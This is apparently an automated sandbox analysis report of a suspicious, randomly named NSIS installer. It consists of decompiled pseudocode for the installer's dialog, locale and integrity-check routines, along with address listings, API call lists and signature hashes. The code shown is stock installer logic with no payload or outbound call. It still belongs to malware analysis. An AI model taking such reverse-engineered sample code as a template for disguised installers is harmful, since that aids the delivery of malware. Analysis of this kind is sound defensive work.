						}
						SetWindowLongA(_t125, _t133, _t133);
						return 1;
					} else {
						DestroyWindow( *0x42e3f8);
						 *0x42e3f8 = _a12;
						L58:
						if( *0x42b0a0 == _t133) {
							_t142 =  *0x42e3f8 - _t133; // 0x0
							if(_t142 != 0) {
								ShowWindow(_t125, 0xa);
								 *0x42b0a0 = 1;
							}
						}
						L61:
						return 0;
					}
				}
			}
































                                                                                            0x004039b9
                                                                                            0x004039c2
                                                                                            0x00403b03
                                                                                            0x00403b07
                                                                                            0x00403b0b
                                                                                            0x00403b0d
                                                                                            0x00403b12
                                                                                            0x00403b1d
                                                                                            0x00403b28
                                                                                            0x00403b2d
                                                                                            0x00403b2f
                                                                                            0x00403b31
                                                                                            0x00403b34
                                                                                            0x00403b39
                                                                                            0x00403b47
                                                                                            0x00403b54
                                                                                            0x00403b5b
                                                                                            0x00403b5b
                                                                                            0x00403b5c
                                                                                            0x00403b5c
                                                                                            0x00403b61
                                                                                            0x00403b67
                                                                                            0x00403b6e
                                                                                            0x00403b74
                                                                                            0x00403b76
                                                                                            0x00403bb6
                                                                                            0x00403bbb
                                                                                            0x00403bc0
                                                                                            0x00403bc0
                                                                                            0x00403bc5
                                                                                            0x00403bce
                                                                                            0x00403bd0
                                                                                            0x00403bd5
                                                                                            0x00403bdb
                                                                                            0x00403bdf
                                                                                            0x00403bdf
                                                                                            0x00403be4
                                                                                            0x00403bea
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00403bf0
                                                                                            0x00403bf5
                                                                                            0x00403bfb
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00403c04
                                                                                            0x00403c0c
                                                                                            0x00403c11
                                                                                            0x00403c14
                                                                                            0x00403c1a
                                                                                            0x00403c1f
                                                                                            0x00403c22
                                                                                            0x00403c28
                                                                                            0x00403c2d
                                                                                            0x00403c30
                                                                                            0x00403c36
                                                                                            0x00403c3e
                                                                                            0x00403c44
                                                                                            0x00403c4a
                                                                                            0x00403c4e
                                                                                            0x00403c55
                                                                                            0x00403c55
                                                                                            0x00403c55
                                                                                            0x00403c5f
                                                                                            0x00403c71
                                                                                            0x00403c7d
                                                                                            0x00403c82
                                                                                            0x00403c8c
                                                                                            0x00403c92
                                                                                            0x00403c94
                                                                                            0x00403c99
                                                                                            0x00403c96
                                                                                            0x00403c96
                                                                                            0x00403c96
                                                                                            0x00403ca9
                                                                                            0x00403cc1
                                                                                            0x00403cc3
                                                                                            0x00403cc9
                                                                                            0x00403cde
                                                                                            0x00403ccb
                                                                                            0x00403cd4
                                                                                            0x00403cd6
                                                                                            0x00403cd6
                                                                                            0x00403ce4
                                                                                            0x00403cf4
                                                                                            0x00403d05
                                                                                            0x00403d0c
                                                                                            0x00403d12
                                                                                            0x00403d16
                                                                                            0x00403d1b
                                                                                            0x00403d1d
                                                                                            0x00000000
                                                                                            0x00403d23
                                                                                            0x00403d23
                                                                                            0x00403d25
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00403d2b
                                                                                            0x00403d2f
                                                                                            0x00403d54
                                                                                            0x00403d5a
                                                                                            0x00403d60
                                                                                            0x00403d62
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00403d88
                                                                                            0x00403d8e
                                                                                            0x00403d90
                                                                                            0x00403d95
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00403d9b
                                                                                            0x00403d9e
                                                                                            0x00403da1
                                                                                            0x00403db8
                                                                                            0x00403dc4
                                                                                            0x00403ddd
                                                                                            0x00403de3
                                                                                            0x00403de7
                                                                                            0x00403dec
                                                                                            0x00403df2
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00403dfc
                                                                                            0x00403e07
                                                                                            0x00000000
                                                                                            0x00403e07
                                                                                            0x00403d31
                                                                                            0x00403d37
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00403d3d
                                                                                            0x00403d43
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00403d49
                                                                                            0x00403d1d
                                                                                            0x00403e14
                                                                                            0x00403e20
                                                                                            0x00403e27
                                                                                            0x00000000
                                                                                            0x00403b78
                                                                                            0x00403b78
                                                                                            0x00403b7b
                                                                                            0x00403bae
                                                                                            0x00403bae
                                                                                            0x00403bb0
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00403bb0
                                                                                            0x00403b7d
                                                                                            0x00403b81
                                                                                            0x00403b86
                                                                                            0x00403b88
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00403b98
                                                                                            0x00403ba0
                                                                                            0x00000000
                                                                                            0x00403ba6
                                                                                            0x004039d4
                                                                                            0x004039d4
                                                                                            0x004039d8
                                                                                            0x004039dd
                                                                                            0x004039ec
                                                                                            0x004039ec
                                                                                            0x004039f5
                                                                                            0x004039fe
                                                                                            0x00403a09
                                                                                            0x00403a09
                                                                                            0x00403a15
                                                                                            0x00403a31
                                                                                            0x00403a34
                                                                                            0x00403a47
                                                                                            0x00403a4d
                                                                                            0x00403af0
                                                                                            0x00000000
                                                                                            0x00403af9
                                                                                            0x00403a53
                                                                                            0x00403a60
                                                                                            0x00403a62
                                                                                            0x00403a64
                                                                                            0x00403a83
                                                                                            0x00403a83
                                                                                            0x00403a86
                                                                                            0x00403a8b
                                                                                            0x00403a8e
                                                                                            0x00403a9e
                                                                                            0x00403a9f
                                                                                            0x00403aa1
                                                                                            0x00403ad7
                                                                                            0x00403aea
                                                                                            0x00000000
                                                                                            0x00403aea
                                                                                            0x00403aa3
                                                                                            0x00403aa9
                                                                                            0x00403ac2
                                                                                            0x00403ac7
                                                                                            0x00403ac9
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00403acb
                                                                                            0x00403ab7
                                                                                            0x00403ab7
                                                                                            0x00403ab9
                                                                                            0x00403ab9
                                                                                            0x00000000
                                                                                            0x00403ab9
                                                                                            0x00403aac
                                                                                            0x00403ab1
                                                                                            0x00000000
                                                                                            0x00403ab1
                                                                                            0x00403a90
                                                                                            0x00403a96
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00403a98
                                                                                            0x00000000
                                                                                            0x00403a98
                                                                                            0x00403a88
                                                                                            0x00000000
                                                                                            0x00403a88
                                                                                            0x00403a6e
                                                                                            0x00403a75
                                                                                            0x00403a7b
                                                                                            0x00403a7d
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00403a7d
                                                                                            0x00403a39
                                                                                            0x00000000
                                                                                            0x00403a17
                                                                                            0x00403a1d
                                                                                            0x00403a27
                                                                                            0x00403e2d
                                                                                            0x00403e33
                                                                                            0x00403e35
                                                                                            0x00403e3b
                                                                                            0x00403e40
                                                                                            0x00403e46
                                                                                            0x00403e46
                                                                                            0x00403e3b
                                                                                            0x00403e50
                                                                                            0x00000000
                                                                                            0x00403e50
                                                                                            0x00403a15

                                                                                            APIs
                                                                                            • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 004039EC
                                                                                            • ShowWindow.USER32(?), ref: 00403A09
                                                                                            • DestroyWindow.USER32 ref: 00403A1D
                                                                                            • SetWindowLongA.USER32(?,00000000,00000000), ref: 00403A39
                                                                                            • GetDlgItem.USER32 ref: 00403A5A
                                                                                            • SendMessageA.USER32(00000000,000000F3,00000000,00000000), ref: 00403A6E
                                                                                            • IsWindowEnabled.USER32(00000000), ref: 00403A75
                                                                                            • GetDlgItem.USER32 ref: 00403B23
                                                                                            • GetDlgItem.USER32 ref: 00403B2D
                                                                                            • KiUserCallbackDispatcher.NTDLL(?,000000F2,?,0000001C,000000FF), ref: 00403B47
                                                                                            • SendMessageA.USER32(0000040F,00000000,00000001,?), ref: 00403B98
                                                                                            • GetDlgItem.USER32 ref: 00403C3E
                                                                                            • ShowWindow.USER32(00000000,?), ref: 00403C5F
                                                                                            • EnableWindow.USER32(?,?), ref: 00403C71
                                                                                            • EnableWindow.USER32(?,?), ref: 00403C8C
                                                                                            • GetSystemMenu.USER32(?,00000000,0000F060,00000001), ref: 00403CA2
                                                                                            • EnableMenuItem.USER32 ref: 00403CA9
                                                                                            • SendMessageA.USER32(?,000000F4,00000000,00000001), ref: 00403CC1
                                                                                            • SendMessageA.USER32(?,00000401,00000002,00000000), ref: 00403CD4
                                                                                            • lstrlenA.KERNEL32(0042A0A0,?,0042A0A0,gqjlpjiaybpobgywdcz Setup), ref: 00403CFD
                                                                                            • SetWindowTextA.USER32(?,0042A0A0), ref: 00403D0C
                                                                                            • ShowWindow.USER32(?,0000000A), ref: 00403E40
                                                                                            Strings
                                                                                            • gqjlpjiaybpobgywdcz Setup, xrefs: 00403CEE
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000027.00000002.776267433.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000027.00000002.776225770.0000000000400000.00000002.00020000.sdmp Download File
                                                                                            • Associated: 00000027.00000002.776324072.0000000000407000.00000002.00020000.sdmp Download File
                                                                                            • Associated: 00000027.00000002.776362591.0000000000409000.00000004.00020000.sdmp Download File
                                                                                            • Associated: 00000027.00000002.776529964.0000000000420000.00000004.00020000.sdmp Download File
                                                                                            • Associated: 00000027.00000002.776577449.000000000042C000.00000004.00020000.sdmp Download File
                                                                                            • Associated: 00000027.00000002.776659350.0000000000434000.00000004.00020000.sdmp Download File
                                                                                            • Associated: 00000027.00000002.776751775.0000000000437000.00000002.00020000.sdmp Download File
                                                                                            Similarity
                                                                                            • API ID: Window$Item$MessageSend$EnableShow$Menu$CallbackDestroyDispatcherEnabledLongSystemTextUserlstrlen
                                                                                            • String ID: gqjlpjiaybpobgywdcz Setup
                                                                                            • API String ID: 4050669955-1554613172
                                                                                            • Opcode ID: 65fa17c4123709d5ac1524d2e1c09fee4b4826ece0b4f58e8075cf8f39e92c43
                                                                                            • Instruction ID: f9ad972cf69bfdf420a9f6130eb54bdd223da945896b7aa78364cccc95eacf8d
                                                                                            • Opcode Fuzzy Hash: 65fa17c4123709d5ac1524d2e1c09fee4b4826ece0b4f58e8075cf8f39e92c43
                                                                                            • Instruction Fuzzy Hash: 9FC1D331604204AFDB21AF62ED45E2B3F6CEB44706F50053EF641B52E1C779A942DB5E
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 0040361A, Relevance: 47.5, APIs: 14, Strings: 13, Instructions: 215stringregistryCOMMON
                                                                                            Download Yara Rule
                                                                                            C-Code - Quality: 96%
                                                                                            			E0040361A(void* __eflags) {
				intOrPtr _v4;
				intOrPtr _v8;
				int _v12;
				int _v16;
				char _v20;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr* _t20;
				signed int _t24;
				void* _t28;
				void* _t30;
				int _t31;
				void* _t34;
				int _t37;
				int _t38;
				intOrPtr _t39;
				int _t42;
				intOrPtr _t60;
				char _t62;
				CHAR* _t64;
				signed char _t68;
				signed short _t72;
				struct HINSTANCE__* _t76;
				CHAR* _t79;
				intOrPtr _t81;
				CHAR* _t85;

				_t81 =  *0x42ec30; // 0x6dc460
				_t20 = E00405F57(3);
				_t88 = _t20;
				if(_t20 == 0) {
					_t79 = 0x42a0a0;
					"1033" = 0x7830;
					E00405AAE(0x80000001, "Control Panel\\Desktop\\ResourceLocale", 0, 0x42a0a0, 0);
					__eflags =  *0x42a0a0;
					if(__eflags == 0) {
						E00405AAE(0x80000003, ".DEFAULT\\Control Panel\\International",  &M00407342, 0x42a0a0, 0);
					}
					lstrcatA("1033", _t79);
				} else {
					_t72 =  *_t20(); // executed
					E00405B25("1033", _t72 & 0x0000ffff);
				}
				E004038E3(_t76, _t88);
				_t24 =  *0x42ec38; // 0x80
				_t84 = "C:\\Users\\hardz\\AppData\\Local\\Temp";
				 *0x42eca0 = _t24 & 0x00000020;
				 *0x42ecbc = 0x10000;
				if(E0040579B(_t88, "C:\\Users\\hardz\\AppData\\Local\\Temp") != 0) {
					L16:
					if(E0040579B(_t96, _t84) == 0) {
						E00405BE9(0, _t79, _t81, _t84,  *((intOrPtr*)(_t81 + 0x118)));
					}
					_t28 = LoadImageA( *0x42ec20, 0x67, 1, 0, 0, 0x8040); // executed
					 *0x42e408 = _t28;
					if( *((intOrPtr*)(_t81 + 0x50)) == 0xffffffff) {
						L21:
						if(E0040140B(0) == 0) {
							_t30 = E004038E3(_t76, __eflags);
							__eflags =  *0x42ecc0; // 0x0
							if(__eflags != 0) {
								_t31 = E00404F85(_t30, 0);
								__eflags = _t31;
								if(_t31 == 0) {
									E0040140B(1);
									goto L33;
								}
								__eflags =  *0x42e3ec; // 0x0
								if(__eflags == 0) {
									E0040140B(2);
								}
								goto L22;
							}
							ShowWindow( *0x42a078, 5); // executed
							_t37 = E00405EE9("RichEd20"); // executed
							__eflags = _t37;
							if(_t37 == 0) {
								E00405EE9("RichEd32");
							}
							_t85 = "RichEdit20A";
							_t38 = GetClassInfoA(0, _t85, 0x42e3c0);
							__eflags = _t38;
							if(_t38 == 0) {
								GetClassInfoA(0, "RichEdit", 0x42e3c0);
								 *0x42e3e4 = _t85;
								RegisterClassA(0x42e3c0);
							}
							_t39 =  *0x42e400; // 0x0
							_t42 = DialogBoxParamA( *0x42ec20, _t39 + 0x00000069 & 0x0000ffff, 0, E004039B0, 0); // executed
							E0040356A(E0040140B(5), 1);
							return _t42;
						}
						L22:
						_t34 = 2;
						return _t34;
					} else {
						_t76 =  *0x42ec20; // 0x400000
						 *0x42e3d4 = _t28;
						_v20 = 0x624e5f;
						 *0x42e3c4 = E00401000;
						 *0x42e3d0 = _t76;
						 *0x42e3e4 =  &_v20;
						if(RegisterClassA(0x42e3c0) == 0) {
							L33:
							__eflags = 0;
							return 0;
						}
						_t12 =  &_v16; // 0x624e5f
						SystemParametersInfoA(0x30, 0, _t12, 0);
						 *0x42a078 = CreateWindowExA(0x80,  &_v20, 0, 0x80000000, _v16, _v12, _v8 - _v16, _v4 - _v12, 0, 0,  *0x42ec20, 0);
						goto L21;
					}
				} else {
					_t76 =  *(_t81 + 0x48);
					if(_t76 == 0) {
						goto L16;
					}
					_t60 =  *0x42ec58; // 0x6e07e0
					_t79 = 0x42dbc0;
					E00405AAE( *((intOrPtr*)(_t81 + 0x44)), _t76,  *((intOrPtr*)(_t81 + 0x4c)) + _t60, 0x42dbc0, 0);
					_t62 =  *0x42dbc0; // 0x67
					if(_t62 == 0) {
						goto L16;
					}
					if(_t62 == 0x22) {
						_t79 = 0x42dbc1;
						 *((char*)(E004056E5(0x42dbc1, 0x22))) = 0;
					}
					_t64 = lstrlenA(_t79) + _t79 - 4;
					if(_t64 <= _t79 || lstrcmpiA(_t64, ?str?) != 0) {
						L15:
						E00405BC7(_t84, E004056BA(_t79));
						goto L16;
					} else {
						_t68 = GetFileAttributesA(_t79);
						if(_t68 == 0xffffffff) {
							L14:
							E00405701(_t79);
							goto L15;
						}
						_t96 = _t68 & 0x00000010;
						if((_t68 & 0x00000010) != 0) {
							goto L15;
						}
						goto L14;
					}
				}
			}






























                                                                                            0x00403620
                                                                                            0x00403629
                                                                                            0x00403630
                                                                                            0x00403632
                                                                                            0x00403646
                                                                                            0x00403658
                                                                                            0x00403662
                                                                                            0x00403667
                                                                                            0x0040366d
                                                                                            0x00403680
                                                                                            0x00403680
                                                                                            0x0040368b
                                                                                            0x00403634
                                                                                            0x00403634
                                                                                            0x0040363f
                                                                                            0x0040363f
                                                                                            0x00403690
                                                                                            0x00403695
                                                                                            0x0040369a
                                                                                            0x004036a3
                                                                                            0x004036a8
                                                                                            0x004036b9
                                                                                            0x00403740
                                                                                            0x00403748
                                                                                            0x00403751
                                                                                            0x00403751
                                                                                            0x00403767
                                                                                            0x0040376d
                                                                                            0x0040377b
                                                                                            0x0040380a
                                                                                            0x00403812
                                                                                            0x0040381c
                                                                                            0x00403821
                                                                                            0x00403827
                                                                                            0x004038b1
                                                                                            0x004038b6
                                                                                            0x004038b8
                                                                                            0x004038d4
                                                                                            0x00000000
                                                                                            0x004038d4
                                                                                            0x004038ba
                                                                                            0x004038c0
                                                                                            0x004038c8
                                                                                            0x004038c8
                                                                                            0x00000000
                                                                                            0x004038c0
                                                                                            0x00403835
                                                                                            0x00403840
                                                                                            0x00403845
                                                                                            0x00403847
                                                                                            0x0040384e
                                                                                            0x0040384e
                                                                                            0x00403859
                                                                                            0x00403861
                                                                                            0x00403863
                                                                                            0x00403865
                                                                                            0x0040386e
                                                                                            0x00403871
                                                                                            0x00403877
                                                                                            0x00403877
                                                                                            0x0040387d
                                                                                            0x00403896
                                                                                            0x004038a7
                                                                                            0x00000000
                                                                                            0x004038ac
                                                                                            0x00403814
                                                                                            0x00403816
                                                                                            0x00000000
                                                                                            0x00403781
                                                                                            0x00403781
                                                                                            0x00403787
                                                                                            0x00403791
                                                                                            0x00403799
                                                                                            0x004037a3
                                                                                            0x004037a9
                                                                                            0x004037b7
                                                                                            0x004038d9
                                                                                            0x004038d9
                                                                                            0x00000000
                                                                                            0x004038d9
                                                                                            0x004037bd
                                                                                            0x004037c6
                                                                                            0x00403805
                                                                                            0x00000000
                                                                                            0x00403805
                                                                                            0x004036bf
                                                                                            0x004036bf
                                                                                            0x004036c4
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x004036c9
                                                                                            0x004036ce
                                                                                            0x004036de
                                                                                            0x004036e3
                                                                                            0x004036ea
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x004036ee
                                                                                            0x004036f0
                                                                                            0x004036fd
                                                                                            0x004036fd
                                                                                            0x00403705
                                                                                            0x0040370b
                                                                                            0x00403733
                                                                                            0x0040373b
                                                                                            0x00000000
                                                                                            0x0040371d
                                                                                            0x0040371e
                                                                                            0x00403727
                                                                                            0x0040372d
                                                                                            0x0040372e
                                                                                            0x00000000
                                                                                            0x0040372e
                                                                                            0x00403729
                                                                                            0x0040372b
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x0040372b
                                                                                            0x0040370b

                                                                                            APIs
                                                                                              • Part of subcall function 00405F57: GetModuleHandleA.KERNEL32(?,?,?,00403194,0000000D), ref: 00405F69
                                                                                              • Part of subcall function 00405F57: GetProcAddress.KERNEL32(00000000,?), ref: 00405F84
                                                                                            • GetUserDefaultUILanguage.KERNELBASE(00000003,C:\Users\user\AppData\Local\Temp\,?,"C:\Program Files (x86)\Gw4n\5jsdph8p9l_r.exe" ,00000000), ref: 00403634
                                                                                              • Part of subcall function 00405B25: wsprintfA.USER32 ref: 00405B32
                                                                                            • lstrcatA.KERNEL32(1033,0042A0A0,80000001,Control Panel\Desktop\ResourceLocale,00000000,0042A0A0,00000000,00000003,C:\Users\user\AppData\Local\Temp\,?,"C:\Program Files (x86)\Gw4n\5jsdph8p9l_r.exe" ,00000000), ref: 0040368B
                                                                                            • lstrlenA.KERNEL32(gqeqcda,?,?,?,gqeqcda,00000000,C:\Users\user\AppData\Local\Temp,1033,0042A0A0,80000001,Control Panel\Desktop\ResourceLocale,00000000,0042A0A0,00000000,00000003,C:\Users\user\AppData\Local\Temp\), ref: 00403700
                                                                                            • lstrcmpiA.KERNEL32(?,.exe,gqeqcda,?,?,?,gqeqcda,00000000,C:\Users\user\AppData\Local\Temp,1033,0042A0A0,80000001,Control Panel\Desktop\ResourceLocale,00000000,0042A0A0,00000000), ref: 00403713
                                                                                            • GetFileAttributesA.KERNEL32(gqeqcda), ref: 0040371E
                                                                                            • LoadImageA.USER32 ref: 00403767
                                                                                            • RegisterClassA.USER32 ref: 004037AE
                                                                                            • SystemParametersInfoA.USER32(00000030,00000000,_Nb,00000000), ref: 004037C6
                                                                                            • CreateWindowExA.USER32 ref: 004037FF
                                                                                            • ShowWindow.USER32(00000005,00000000), ref: 00403835
                                                                                            • GetClassInfoA.USER32 ref: 00403861
                                                                                            • GetClassInfoA.USER32 ref: 0040386E
                                                                                            • RegisterClassA.USER32 ref: 00403877
                                                                                            • DialogBoxParamA.USER32 ref: 00403896
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000027.00000002.776267433.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000027.00000002.776225770.0000000000400000.00000002.00020000.sdmp Download File
                                                                                            • Associated: 00000027.00000002.776324072.0000000000407000.00000002.00020000.sdmp Download File
                                                                                            • Associated: 00000027.00000002.776362591.0000000000409000.00000004.00020000.sdmp Download File
                                                                                            • Associated: 00000027.00000002.776529964.0000000000420000.00000004.00020000.sdmp Download File
                                                                                            • Associated: 00000027.00000002.776577449.000000000042C000.00000004.00020000.sdmp Download File
                                                                                            • Associated: 00000027.00000002.776659350.0000000000434000.00000004.00020000.sdmp Download File
                                                                                            • Associated: 00000027.00000002.776751775.0000000000437000.00000002.00020000.sdmp Download File
                                                                                            Similarity
                                                                                            • API ID: Class$Info$RegisterWindow$AddressAttributesCreateDefaultDialogFileHandleImageLanguageLoadModuleParamParametersProcShowSystemUserlstrcatlstrcmpilstrlenwsprintf
                                                                                            • String ID: "C:\Program Files (x86)\Gw4n\5jsdph8p9l_r.exe" $.DEFAULT\Control Panel\International$.exe$1033$C:\Users\user\AppData\Local\Temp$C:\Users\user\AppData\Local\Temp\$Control Panel\Desktop\ResourceLocale$RichEd20$RichEd32$RichEdit$RichEdit20A$_Nb$gqeqcda
                                                                                            • API String ID: 606308-4079283529
                                                                                            • Opcode ID: 68b385dab8efbc3c057c942a316a407ac7ea9197ea381ea52f3d6580dbe3b634
                                                                                            • Instruction ID: 439cf4cca7a437fbaee012d0436cdd450a481f2d9ea16570e6e497c3a9acd7f8
                                                                                            • Opcode Fuzzy Hash: 68b385dab8efbc3c057c942a316a407ac7ea9197ea381ea52f3d6580dbe3b634
                                                                                            • Instruction Fuzzy Hash: 4861C6B16042007EE220BF629C45E273AACEB44759F44447FF941B62E2DB7DA9418A3E
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 00402C55, Relevance: 24.7, APIs: 5, Strings: 9, Instructions: 182COMMON
                                                                                            Download Yara Rule
                                                                                            C-Code - Quality: 80%
                                                                                            			E00402C55(void* __eflags, signed int _a4) {
				DWORD* _v8;
				DWORD* _v12;
				void* _v16;
				intOrPtr _v20;
				long _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				signed int _v44;
				long _t43;
				signed int _t50;
				void* _t53;
				signed int _t54;
				void* _t57;
				intOrPtr* _t59;
				long _t60;
				signed int _t65;
				signed int _t67;
				signed int _t70;
				signed int _t71;
				signed int _t77;
				intOrPtr _t80;
				long _t82;
				signed int _t85;
				signed int _t87;
				void* _t89;
				signed int _t90;
				signed int _t93;
				void* _t94;

				_t82 = 0;
				_v12 = 0;
				_v8 = 0;
				_t43 = GetTickCount();
				_t91 = "C:\\Program Files (x86)\\Gw4n\\5jsdph8p9l_r.exe";
				 *0x42ec2c = _t43 + 0x3e8;
				GetModuleFileNameA(0, "C:\\Program Files (x86)\\Gw4n\\5jsdph8p9l_r.exe", 0x400);
				_t89 = E0040589E(_t91, 0x80000000, 3);
				_v16 = _t89;
				 *0x409014 = _t89;
				if(_t89 == 0xffffffff) {
					return "Error launching installer";
				}
				_t92 = "C:\\Program Files (x86)\\Gw4n";
				E00405BC7("C:\\Program Files (x86)\\Gw4n", _t91);
				E00405BC7(0x436000, E00405701(_t92));
				_t50 = GetFileSize(_t89, 0);
				__eflags = _t50;
				 *0x428c50 = _t50;
				_t93 = _t50;
				if(_t50 <= 0) {
					L24:
					E00402BF1(1);
					__eflags =  *0x42ec34 - _t82; // 0x8800
					if(__eflags == 0) {
						goto L29;
					}
					__eflags = _v8 - _t82;
					if(_v8 == _t82) {
						L28:
						_t53 = GlobalAlloc(0x40, _v24); // executed
						_t94 = _t53;
						_t54 =  *0x42ec34; // 0x8800
						E004030E2(_t54 + 0x1c);
						_push(_v24);
						_push(_t94);
						_push(_t82);
						_push(0xffffffff); // executed
						_t57 = E00402E8E(); // executed
						__eflags = _t57 - _v24;
						if(_t57 == _v24) {
							__eflags = _v44 & 0x00000001;
							 *0x42ec30 = _t94;
							 *0x42ec38 =  *_t94;
							if((_v44 & 0x00000001) != 0) {
								 *0x42ec3c =  *0x42ec3c + 1;
								__eflags =  *0x42ec3c;
							}
							_t40 = _t94 + 0x44; // 0x44
							_t59 = _t40;
							_t85 = 8;
							do {
								_t59 = _t59 - 8;
								 *_t59 =  *_t59 + _t94;
								_t85 = _t85 - 1;
								__eflags = _t85;
							} while (_t85 != 0);
							_t60 = SetFilePointer(_v16, _t82, _t82, 1); // executed
							 *(_t94 + 0x3c) = _t60;
							E0040585F(0x42ec40, _t94 + 4, 0x40);
							__eflags = 0;
							return 0;
						}
						goto L29;
					}
					E004030E2( *0x414c40);
					_t65 = E004030B0( &_a4, 4);
					__eflags = _t65;
					if(_t65 == 0) {
						goto L29;
					}
					__eflags = _v12 - _a4;
					if(_v12 != _a4) {
						goto L29;
					}
					goto L28;
				} else {
					do {
						_t67 =  *0x42ec34; // 0x8800
						_t90 = _t93;
						asm("sbb eax, eax");
						_t70 = ( ~_t67 & 0x00007e00) + 0x200;
						__eflags = _t93 - _t70;
						if(_t93 >= _t70) {
							_t90 = _t70;
						}
						_t71 = E004030B0(0x420c50, _t90); // executed
						__eflags = _t71;
						if(_t71 == 0) {
							E00402BF1(1);
							L29:
							return "Installer integrity check has failed. Common causes include\nincomplete download and damaged media. Contact the\ninstaller\'s author to obtain a new copy.\n\nMore information at:\nhttp://nsis.sf.net/NSIS_Error";
						}
						__eflags =  *0x42ec34;
						if( *0x42ec34 != 0) {
							__eflags = _a4 & 0x00000002;
							if((_a4 & 0x00000002) == 0) {
								E00402BF1(0);
							}
							goto L20;
						}
						E0040585F( &_v44, 0x420c50, 0x1c);
						_t77 = _v44;
						__eflags = _t77 & 0xfffffff0;
						if((_t77 & 0xfffffff0) != 0) {
							goto L20;
						}
						__eflags = _v40 - 0xdeadbeef;
						if(_v40 != 0xdeadbeef) {
							goto L20;
						}
						__eflags = _v28 - 0x74736e49;
						if(_v28 != 0x74736e49) {
							goto L20;
						}
						__eflags = _v32 - 0x74666f73;
						if(_v32 != 0x74666f73) {
							goto L20;
						}
						__eflags = _v36 - 0x6c6c754e;
						if(_v36 != 0x6c6c754e) {
							goto L20;
						}
						_a4 = _a4 | _t77;
						_t87 =  *0x414c40; // 0x8800
						 *0x42ecc0 =  *0x42ecc0 | _a4 & 0x00000002;
						_t80 = _v20;
						__eflags = _t80 - _t93;
						 *0x42ec34 = _t87;
						if(_t80 > _t93) {
							goto L29;
						}
						__eflags = _a4 & 0x00000008;
						if((_a4 & 0x00000008) != 0) {
							L16:
							_v8 = _v8 + 1;
							_t93 = _t80 - 4;
							__eflags = _t90 - _t93;
							if(_t90 > _t93) {
								_t90 = _t93;
							}
							goto L20;
						}
						__eflags = _a4 & 0x00000004;
						if((_a4 & 0x00000004) != 0) {
							break;
						}
						goto L16;
						L20:
						__eflags = _t93 -  *0x428c50;
						if(_t93 <  *0x428c50) {
							_v12 = E00405FC6(_v12, 0x420c50, _t90);
						}
						 *0x414c40 =  *0x414c40 + _t90;
						_t93 = _t93 - _t90;
						__eflags = _t93;
					} while (_t93 > 0);
					_t82 = 0;
					__eflags = 0;
					goto L24;
				}
			}

































                                                                                            0x00402c5d
                                                                                            0x00402c60
                                                                                            0x00402c63
                                                                                            0x00402c66
                                                                                            0x00402c6c
                                                                                            0x00402c7d
                                                                                            0x00402c82
                                                                                            0x00402c95
                                                                                            0x00402c9a
                                                                                            0x00402c9d
                                                                                            0x00402ca3
                                                                                            0x00000000
                                                                                            0x00402ca5
                                                                                            0x00402cb0
                                                                                            0x00402cb6
                                                                                            0x00402cc7
                                                                                            0x00402cce
                                                                                            0x00402cd4
                                                                                            0x00402cd6
                                                                                            0x00402cdb
                                                                                            0x00402cdd
                                                                                            0x00402dca
                                                                                            0x00402dcc
                                                                                            0x00402dd1
                                                                                            0x00402dd8
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00402dda
                                                                                            0x00402ddd
                                                                                            0x00402e01
                                                                                            0x00402e06
                                                                                            0x00402e0c
                                                                                            0x00402e0e
                                                                                            0x00402e17
                                                                                            0x00402e1c
                                                                                            0x00402e1f
                                                                                            0x00402e20
                                                                                            0x00402e21
                                                                                            0x00402e23
                                                                                            0x00402e28
                                                                                            0x00402e2b
                                                                                            0x00402e3e
                                                                                            0x00402e42
                                                                                            0x00402e4a
                                                                                            0x00402e4f
                                                                                            0x00402e51
                                                                                            0x00402e51
                                                                                            0x00402e51
                                                                                            0x00402e59
                                                                                            0x00402e59
                                                                                            0x00402e5c
                                                                                            0x00402e5d
                                                                                            0x00402e5d
                                                                                            0x00402e60
                                                                                            0x00402e62
                                                                                            0x00402e62
                                                                                            0x00402e62
                                                                                            0x00402e6c
                                                                                            0x00402e72
                                                                                            0x00402e80
                                                                                            0x00402e85
                                                                                            0x00000000
                                                                                            0x00402e85
                                                                                            0x00000000
                                                                                            0x00402e2b
                                                                                            0x00402de5
                                                                                            0x00402df0
                                                                                            0x00402df5
                                                                                            0x00402df7
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00402dfc
                                                                                            0x00402dff
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00402ce3
                                                                                            0x00402ce8
                                                                                            0x00402ce8
                                                                                            0x00402ced
                                                                                            0x00402cf1
                                                                                            0x00402cf8
                                                                                            0x00402cfd
                                                                                            0x00402cff
                                                                                            0x00402d01
                                                                                            0x00402d01
                                                                                            0x00402d05
                                                                                            0x00402d0a
                                                                                            0x00402d0c
                                                                                            0x00402e36
                                                                                            0x00402e2d
